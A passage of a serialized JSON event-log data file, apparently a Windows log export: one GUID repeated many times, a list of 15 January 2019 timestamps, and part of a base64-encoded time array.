39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\"],\"TimeCreatedUtc\":[\"2019-01-15 05:24:24.010\",\"2019-01-15 05:24:24.023\",\"2019-01-15 05:24:25.807\",\"2019-01-15 05:24:26.010\",\"2019-01-15 05:07:26.003\",\"2019-01-15 05:08:24.013\",\"2019-01-15 05:08:24.030\",\"2019-01-15 05:08:25.717\",\"2019-01-15 05:08:26.007\",\"2019-01-15 05:09:26.010\",\"2019-01-15 05:10:24.000\",\"2019-01-15 05:10:24.047\",\"2019-01-15 05:10:25.653\",\"2019-01-15 05:10:26.000\",\"2019-01-15 05:20:24.000\",\"2019-01-15 05:20:24.017\",\"2019-01-15 05:20:25.337\",\"2019-01-15 05:20:26.017\",\"2019-01-15 05:21:26.003\",\"2019-01-15 05:17:26.000\",\"2019-01-15 05:18:24.010\",\"2019-01-15 05:18:24.027\",\"2019-01-15 05:18:25.407\",\"2019-01-15 05:18:26.010\",\"2019-01-15 05:19:26.000\",\"2019-01-15 04:47:26.000\",\"2019-01-15 04:48:24.013\",\"2019-01-15 04:48:24.030\",\"2019-01-15 04:48:25.743\",\"2019-01-15 04:48:26.017\",\"2019-01-15 04:39:26.000\",\"2019-01-15 04:40:24.013\",\"2019-01-15 04:40:24.027\",\"2019-01-15 04:40:25.393\",\"2019-01-15 04:40:26.000\",\"2019-01-15 04:37:26.007\",\"2019-01-15 04:38:24.000\",\"2019-01-15 04:38:24.020\",\"2019-01-15 04:38:25.453\",\"2019-01-15 04:38:26.017\",\"2019-01-15 04:17:26.000\",\"2019-01-15 04:18:24.003\",\"2019-01-15 04:18:24.020\",\"2019-01-15 04:18:25.490\",\"2019-01-15 04:18:26.010\",\"2019-01-15 05:13:26.007\",\"2019-01-15 05:15:16.167\",\"2019-01-15 05:15:16.277\",\"2019-01-15 05:15:16.340\",\"2019-01-15 05:15:16.353\",\"2019-01-15 05:15:16.400\",\"2019-01-15 05:15:16.430\",\"2019-01-15 05:15:16.447\",\"2019-01-15 05:15:16.500\",\"2019-01-15 05:15:16.510\",\"2019-01-15 05:15:16.520\",\"2019-01-15 05:15:16.563\",\"2019-01-15 05:15:16.613\",\"2019-01-15 05:15:16.663\",\"2019-01-15 05:15:16.677\",\"2019-01-15 05:15:16.720\",\"2019-01-15 05:15:16.767\",\"2019-01-15 05:15:16.807\",\"2019-01-15 05:15:16.850\",\"2019-01-15 05:15:16.893\",\"2019-01-15 05:15:16.967\",\"2019-01-15 05:15:17.020\",\"2019-01-15 05:15:17.077\",\"2019-01-15 05:15:17.127\",\"2019-01-15 05:15:17.137\",\"2019-01-15 05:14:24.003\",\"2019-01-15 05:14:24.023\",\"2019-01-15 05:14:25.517\",\"2019-01-15 05:14:26.013\",\"2019-01-15 05:15:03.017\",\"2019-01-15 05:15:03.047\",\"2019-01-15 05:15:03.057\",\"2019-01-15 05:15:03.247\",\"2019-01-15 05:15:03.257\",\"2019-01-15 05:15:03.390\",\"2019-01-15 05:15:03.410\",\"2019-01-15 05:15:03.503\",\"2019-01-15 05:15:03.517\",\"2019-01-15 05:15:03.543\",\"2019-01-15 05:15:03.550\",\"2019-01-15 05:15:03.830\",\"2019-01-15 05:15:03.850\",\"2019-01-15 05:15:04.507\",\"2019-01-15 05:15:05.193\",\"2019-01-15 05:15:08.723\",\"2019-01-15 05:15:10.667\",\"2019-01-15 05:15:10.683\",\"2019-01-15 05:15:10.707\",\"2019-01-15 05:15:10.730\",\"2019-01-15 05:15:10.753\",\"2019-01-15 05:15:10.817\",\"2019-01-15 05:15:11.190\",\"2019-01-15 05:15:11.260\",\"2019-01-15 05:15:11.347\",\"2019-01-15 05:15:11.413\",\"2019-01-15 05:15:11.493\",\"2019-01-15 05:15:11.537\",\"2019-01-15 05:15:11.617\",\"2019-01-15 05:15:12.930\",\"2019-01-15 05:15:12.977\",\"2019-01-15 05:15:13.053\",\"2019-01-15 05:15:13.100\",\"2019-01-15 05:15:13.173\",\"2019-01-15 05:15:13.220\",\"2019-01-15 05:15:13.287\",\"2019-01-15 05:15:13.337\",\"2019-01-15 05:15:13.407\",\"2019-01-15 05:15:13.453\",\"2019-01-15 05:15:13.517\",\"2019-01-15 05:15:13.567\",\"2019-01-15 05:15:13.633\",\"2019-01-15 05:15:13.683\",\"2019-01-15 05:15:13.747\",\"2019-01-15 05:15:13.793\",\"2019-01-15 05:15:13.867\",\"2019-01-15 05:15:11.767\",\"2019-01-15 05:15:11.833\",\"2019-01-15 05:15:11.947\",\"2019-01-15 05:15:12.003\",\"2019-01-15 05:15:12.067\",\"2019-01-15 05:15:12.123\",\"2019-01-15 05:15:12.160\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.337\",\"2019-01-15 05:15:12.393\",\"2019-01-15 05:15:12.460\",\"2019-01-15 05:15:12.513\",\"2019-01-15 04:35:15.673\",\"2019-01-15 04:35:16.060\",\"2019-01-15 04:35:26.010\",\"2019-01-15 05:15:12.610\",\"2019-01-15 05:15:12.670\",\"2019-01-15 05:15:12.740\",\"2019-01-15 05:15:12.847\",\"2019-01-15 05:15:15.160\",\"2019-01-15 05:15:15.183\",\"2019-01-15 05:15:15.233\",\"2019-01-15 05:15:15.283\",\"2019-01-15 05:15:15.317\",\"2019-01-15 05:15:15.440\",\"2019-01-15 05:15:15.457\",\"2019-01-15 05:15:15.483\",\"2019-01-15 05:15:15.500\",\"2019-01-15 05:15:15.520\",\"2019-01-15 05:15:15.533\",\"2019-01-15 05:15:15.553\",\"2019-01-15 05:15:15.570\",\"2019-01-15 05:15:15.620\",\"2019-01-15 05:15:15.677\",\"2019-01-15 05:15:15.727\",\"2019-01-15 05:15:15.777\",\"2019-01-15 05:15:15.827\",\"2019-01-15 05:15:15.880\",\"2019-01-15 05:15:15.923\",\"2019-01-15 05:15:15.950\",\"2019-01-15 05:15:15.967\",\"2019-01-15 05:15:16.020\",\"2019-01-15 05:15:16.067\",\"2019-01-15 05:15:16.117\",\"2019-01-15 05:15:17.217\",\"2019-01-15 05:15:17.220\",\"2019-01-15 05:15:17.257\",\"2019-01-15 05:15:17.363\",\"2019-01-15 05:15:17.410\",\"2019-01-15 05:15:17.457\",\"2019-01-15 05:15:17.493\",\"2019-01-15 05:15:17.520\",\"2019-01-15 05:15:17.570\",\"2019-01-15 05:15:17.580\",\"2019-01-15 05:15:17.650\",\"2019-01-15 05:15:18.080\",\"2019-01-15 05:15:18.147\",\"2019-01-15 05:15:18.230\",\"2019-01-15 04:36:24.010\",\"2019-01-15 04:36:24.027\",\"2019-01-15 04:36:25.517\",\"2019-01-15 04:36:26.000\",\"2019-01-15 04:49:26.010\",\"2019-01-15 04:50:24.000\",\"2019-01-15 04:50:24.017\",\"2019-01-15 04:50:25.693\",\"2019-01-15 04:50:26.010\",\"2019-01-15 04:33:26.003\",\"2019-01-15 04:33:32.463\",\"2019-01-15 05:15:18.287\",\"2019-01-15 05:15:18.300\",\"2019-01-15 05:15:18.320\",\"2019-01-15 05:15:18.337\",\"2019-01-15 05:15:18.403\",\"2019-01-15 05:15:18.450\",\"2019-01-15 05:15:18.500\",\"2019-01-15 05:15:18.547\",\"2019-01-15 05:15:18.553\",\"2019-01-15 05:15:18.630\",\"2019-01-15 05:15:18.670\",\"2019-01-15 05:15:18.707\",\"2019-01-15 05:15:18.770\",\"2019-01-15 05:15:18.820\",\"2019-01-15 05:15:18.867\",\"2019-01-15 05:15:18.917\",\"2019-01-15 05:15:18.967\",\"2019-01-15 05:15:19.010\",\"2019-01-15 05:15:19.060\",\"2019-01-15 05:15:19.127\",\"2019-01-15 05:15:19.180\",\"2019-01-15 05:15:19.223\",\"2019-01-15 05:15:19.337\",\"2019-01-15 05:15:19.403\",\"2019-01-15 05:15:19.447\",\"2019-01-15 05:15:19.490\",\"2019-01-15 05:15:19.537\",\"2019-01-15 05:15:19.583\",\"2019-01-15 05:15:19.617\",\"2019-01-15 05:15:20.623\",\"2019-01-15 05:15:26.013\",\"2019-01-15 05:15:14.033\",\"2019-01-15 05:15:14.100\",\"2019-01-15 05:15:14.157\",\"2019-01-15 05:15:14.227\",\"2019-01-15 05:15:14.293\",\"2019-01-15 05:15:14.377\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.490\",\"2019-01-15 05:15:14.493\",\"2019-01-15 05:15:14.563\",\"2019-01-15 05:15:14.613\",\"2019-01-15 05:15:14.640\",\"2019-01-15 05:15:14.693\",\"2019-01-15 05:15:14.770\",\"2019-01-15 05:05:26.000\",\"2019-01-15 05:06:24.000\",\"2019-01-15 05:06:24.043\",\"2019-01-15 05:06:25.770\",\"2019-01-15 05:06:26.000\",\"2019-01-15 04:34:24.010\",\"2019-01-15 04:34:24.030\",\"2019-01-15 04:34:25.583\",\"2019-01-15 04:34:26.000\",\"2019-01-15 04:25:26.000\",\"2019-01-15 04:26:24.000\",\"2019-01-15 04:26:24.017\",\"2019-01-15 04:26:25.833\",\"2019-01-15 04:26:26.007\",\"2019-01-15 04:41:26.000\",\"2019-01-15 04:42:24.000\",\"2019-01-15 04:42:24.017\",\"2019-01-15 04:42:25.387\",\"2019-01-15 04:42:25.437\",\"2019-01-15 04:42:26.007\",\"2019-01-15 04:43:05.240\",\"2019-01-15 04:43:05.253\",\"2019-01-15 04:43:26.000\",\"2019-01-15 04:19:26.000\",\"2019-01-15 04:20:24.000\",\"2019-01-15 04:20:24.017\",\"2019-01-15 04:20:25.423\",\"2019-01-15 04:20:26.007\",\"2019-01-15 04:31:26.000\",\"2019-01-15 04:32:24.010\",\"2019-01-15 04:32:24.027\",\"2019-01-15 04:32:25.650\",\"2019-01-15 04:32:26.000\",\"2019-01-15 04:27:26.000\",\"2019-01-15 04:28:01.517\",\"2019-01-15 04:28:24.003\",\"2019-01-15 04:28:24.020\",\"2019-01-15 04:28:25.770\",\"2019-01-15 04:28:26.013\",\"2019-01-15 04:28:33.090\",\"2019-01-15 05:11:26.000\",\"2019-01-15 05:12:24.007\",\"2019-01-15 05:12:24.023\",\"2019-01-15 05:12:25.403\",\"2019-01-15 05:12:25.590\",\"2019-01-15 05:12:26.003\",\"2019-01-15 04:29:26.010\",\"2019-01-15 04:30:24.007\",\"2019-01-15 04:30:24.023\",\"2019-01-15 04:30:25.710\",\"2019-01-15 04:30:26.000\",\"2019-01-15 05:16:24.003\",\"2019-01-15 05:16:24.020\",\"2019-01-15 05:16:25.453\",\"2019-01-15 05:16:26.007\",\"2019-01-15 04:23:26.000\",\"2019-01-15 04:23:43.103\",\"2019-01-15 04:24:24.000\",\"2019-01-15 04:24:24.017\",\"2019-01-15 04:24:25.307\",\"2019-01-15 04:24:26.000\",\"2019-01-15 04:44:24.000\",\"2019-01-15 04:44:24.017\",\"2019-01-15 04:44:25.867\",\"2019-01-15 04:44:26.007\",\"2019-01-15 04:44:37.180\",\"2019-01-15 04:44:37.193\",\"2019-01-15 04:21:26.000\",\"2019-01-15 04:22:24.017\",\"2019-01-15 04:22:24.030\",\"2019-01-15 04:22:25.360\",\"2019-01-15 04:22:26.010\",\"2019-01-15 04:15:26.000\",\"2019-01-15 04:16:24.007\",\"2019-01-15 04:16:24.027\",\"2019-01-15 04:16:25.550\",\"2019-01-15 04:16:26.000\",\"2019-01-15 05:22:24.007\",\"2019-01-15 05:22:24.023\",\"2019-01-15 05:22:25.863\",\"2019-01-15 05:22:26.007\",\"2019-01-15 05:23:26.000\",\"2019-01-15 04:51:26.000\",\"2019-01-15 04:52:24.000\",\"2019-01-15 04:52:24.020\",\"2019-01-15 04:52:25.613\",\"2019-01-15 04:52:26.013\",\"2019-01-15 04:59:26.017\",\"2019-01-15 05:00:24.003\",\"2019-01-15 05:00:24.017\",\"2019-01-15 05:00:25.363\",\"2019-01-15 05:00:26.000\",\"2019-01-15 05:03:26.000\",\"2019-01-15 05:04:24.000\",\"2019-01-15 05:04:24.020\",\"2019-01-15 05:04:25.837\",\"2019-01-15 05:04:26.007\",\"2019-01-15 05:01:26.007\",\"2019-01-15 05:01:52.640\",\"2019-01-15 05:02:24.000\",\"2019-01-15 05:02:24.027\",\"2019-01-15 05:02:25.293\",\"2019-01-15 05:02:26.003\",\"2019-01-15 05:02:28.260\",\"2019-01-15 05:02:28.270\",\"2019-01-15 04:55:26.000\",\"2019-01-15 04:56:24.003\",\"2019-01-15 04:56:24.020\",\"2019-01-15 04:56:25.490\",\"2019-01-15 04:56:26.000\",\"2019-01-15 04:53:26.000\",\"2019-01-15 04:54:24.003\",\"2019-01-15 04:54:24.020\",\"2019-01-15 04:54:25.557\",\"2019-01-15 04:54:26.007\",\"2019-01-15 04:57:26.000\",\"2019-01-15 04:58:24.013\",\"2019-01-15 04:58:24.030\",\"2019-01-15 04:58:25.427\",\"2019-01-15 04:58:26.010\",\"2019-01-15 04:45:24.523\",\"2019-01-15 04:45:26.007\",\"2019-01-15 04:45:28.157\",\"2019-01-15 04:46:24.017\",\"2019-01-15 04:46:24.033\",\"2019-01-15 04:46:25.800\",\"2019-01-15 04:46:26.007\"],\"TimeGenerated\":{\"__ndarray__\":\"AKA0fP+EdkIAcDV8/4R2QgDwpHz/hHZCAKCxfP+EdkIAMKuD/oR2QgDQ1JH+hHZCAODVkf6EdkIAUD+S/oR2QgBwUZL+hHZCAKD3oP6EdkIAACCv/oR2QgDwIq/+hHZCAFCHr/6EdkIAAJ2v/oR2QgAAnEH/hHZCABCdQf+EdkIAkO9B/4R2QgAQGkL/hHZCADC/UP+EdkIAACcW/4R2QgCgUCT/hHZCALBRJP+EdkIA8Kck/4R2QgCgzST/hHZCAABzM/+EdkIAALNe/YR2QgDQ3Gz9hHZCAODdbP2EdkIA8Eht/YR2QgAQWm39hHZCAACD6fyEdkIA0Kz3/IR2QgCwrff8hHZCABAD+PyEdkIAACn4/IR2QgBwN8z8hHZCAABg2vyEdkIAQGHa/IR2QgDQutr8hHZCABDe2vyEdkIAAD+n+4R2QgAwaLX7hHZCAEBptfuEdkIAIMW1+4R2QgCg5bX7hHZCAHCP2/6EdkIAcHT2/oR2QgBQe/b+hHZCAEB/9v6EdkIAEID2/oR2QgAAg/b+hHZCAOCE9v6EdkIA8IX2/oR2QgBAifb+hHZCAOCJ9v6EdkIAgIr2/oR2QgAwjfb+hHZCAFCQ9v6EdkIAcJP2/oR2QgBQlPb+hHZCAACX9v6EdkIA8Jn2/oR2QgBwnPb+hHZCACCf9v6EdkIA0KH2/oR2QgBwpvb+hHZCAMCp9v6EdkIAUK32/oR2QgBwsPb+hHZCABCx9v6EdkIAMLjp/oR2QgBwuen+hHZCANAW6v6EdkIA0DXq/oR2QgCQPvP+hHZCAHBA8/6EdkIAEEHz/oR2QgDwTPP+hHZCAJBN8/6EdkIA4FXz/oR2QgAgV/P+hHZCAPBc8/6EdkIA0F3z/oR2QgBwX/P+hHZCAOBf8/6EdkIAYHHz/oR2QgCgcvP+hHZCALCb8/6EdkIAkMbz/oR2QgAwo/T+hHZCALAc9f6EdkIAsB31/oR2QgAwH/X+hHZCAKAg9f6EdkIAECL1/oR2QgAQJvX+hHZCAGA99f6EdkIAwEH1/oR2QgAwR/X+hHZCAFBL9f6EdkIAUFD1/oR2QgAQU/X+hHZCABBY9f6EdkIAIKr1/oR2QgAQrfX+hHZCANCx9f6EdkIAwLT1/oR2QgBQufX+hHZCAEC89f6EdkIAcMD1/oR2QgCQw/X+hHZCAPDH9f6EdkIA0Mr1/oR2QgDQzvX+hHZCAPDR9f6EdkIAENb1/oR2QgAw2fX+hHZCADDd9f6EdkIAEOD1/oR2QgCw5PX+hHZCAHBh9f6EdkIAkGX1/oR2QgCwbPX+hHZCADBw9f6EdkIAMHT1/oR2QgCwd/X+hHZCAAB69f6EdkIAcHr1/oR2QgBwevX+hHZCABCF9f6EdkIAkIj1/oR2QgDAjPX+hHZCABCQ9f6EdkIAkGWs/IR2QgDAfaz8hHZCAKDrrvyEdkIAIJb1/oR2QgDgmfX+hHZCAECe9f6EdkIA8KT1/oR2QgCANfb+hHZCAPA29v6EdkIAEDr2/oR2QgAwPfb+hHZCAFA/9v6EdkIAAEf2/oR2QgAQSPb+hHZCALBJ9v6EdkIAwEr2/oR2QgAATPb+hHZCANBM9v6EdkIAEE72/oR2QgAgT/b+hHZCAEBS9v6EdkIA0FX2/oR2QgDwWPb+hHZCABBc9v6EdkIAMF/2/oR2QgCAYvb+hHZCADBl9v6EdkIA4Gb2/oR2QgDwZ/b+hHZCAEBr9v6EdkIAMG72/oR2